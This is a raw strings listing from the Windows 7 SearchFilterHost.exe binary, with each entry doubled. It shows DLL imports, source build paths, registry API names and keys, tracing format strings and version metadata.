ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
IMM32.dll
IMM32.dll
MSSHooks.dll
MSSHooks.dll
mscoree.dll
mscoree.dll
SHLWAPI.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
SearchFilterHost.pdb
SearchFilterHost.pdb
version="5.1.0.0"
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
name="Microsoft.Windows.Search.MSSFH"
3 3(30383|3
3 3(30383|3
kernel32.dll
kernel32.dll
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
tquery.dll
tquery.dll
advapi32.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
0xx%p%S%d
0xx%p%S%d
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
0xx=
0xx=
%S(%d)
%S(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%S"
tagname="%S"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
%s\%s
%s\%s
winhttp.dll
winhttp.dll
Microsoft Windows Search Filter Host
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
SearchFilterHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610